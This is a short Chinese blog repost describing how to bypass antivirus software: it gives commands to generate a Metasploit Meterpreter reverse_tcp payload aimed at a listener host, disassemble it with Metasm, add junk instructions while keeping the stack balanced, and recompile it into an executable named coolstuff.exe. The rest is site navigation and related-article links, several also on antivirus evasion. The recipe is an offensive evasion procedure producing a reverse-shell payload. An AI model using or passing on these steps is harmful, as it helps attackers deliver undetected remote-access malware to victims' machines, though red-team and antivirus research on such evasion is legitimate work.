使用Metasm来绕过杀毒软件 - 代码天地

使用Metasm来绕过杀毒软件

编程语言 2018-05-12 01:09:23 阅读次数: 0

技术本质还是花指令，本文的目的是使用metasploit框架来生成raw payload，反汇编payload，使用花指令，然后重新编译成二进制可执行文件
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp /usr/share/metasploit-framework/lib/metasm.rb /usr/local/lib/site_ruby/1.9.1/
cp -r /usr/share/metasploit-framework/lib/metasm /usr/local/lib/site_ruby/1.9.1/
3. ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > test.asm
4.编辑花指令。关键一点，栈平衡
5. ruby /usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rb test.asm -o coolstuff.exe

猜你喜欢

转载自j4s0nh4ck.iteye.com/blog/2124230

使用Metasm来绕过杀毒软件

使用veil绕过杀毒软件

免杀原理与实践——使用msfvenom与veil绕过杀毒软件

PowerShell脚本免杀/bypass/绕过杀毒软件

杀毒软件clamav的安装和使用

杀毒软件原理

杀毒软件

趣谈杀毒软件

杀毒软件推荐

关于杀毒软件

WSL 使用者仍应该使用杀毒软件

Linux下杀毒软件clamav的安装和使用

欢迎使用CLamav杀毒软件管理Linux系统

Linux下Clamav 杀毒软件安装使用文档

Archlinux/Manjaro安装配置使用clamav杀毒软件

Linux下杀毒软件Clamav的安装和使用.md

centos可免费安装使用comodo杀毒软件

Linux 下杀毒软件 clamav 的安装和使用

CentOS7杀毒软件ClamAV的安装和使用

Linux之ClamAV杀毒软件YUM安装和使用

Windows Server 杀毒软件

Linux杀毒软件(ClamAV)

测试杀毒软件代码

如何利用十行C++代码，绕过杀毒软件实现免杀？

杀毒软件性能比较

世界顶级杀毒软件排行（Toptennews）

免费杀毒软件| Avast 2018

神器| 良心杀毒软件,干净纯粹!

CentOS 7安装LMD杀毒软件

微软的杀毒软件在 MacOS 上推出

今日推荐

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

最强开源大模型 Llama 3 上架 Gitee AI

周排行

自媒体文章如何提高原创度以及如何检测原创度

开启qq邮箱的smtp服务

Qt程序单次启动（QSingleApplication类）

国外的外包网站

更新IDEA主题——放飞代码风格

cocos2dx 实现搓牌效果（翻牌效果），包括铺平动画

dict和json之间的互相转换

angular的一些思考

. Fibonacci数列是这样定义的： F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此，Fibonacci数列就形如：0, 1

洛谷P1064 金明的预算方案

每日归档

更多

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)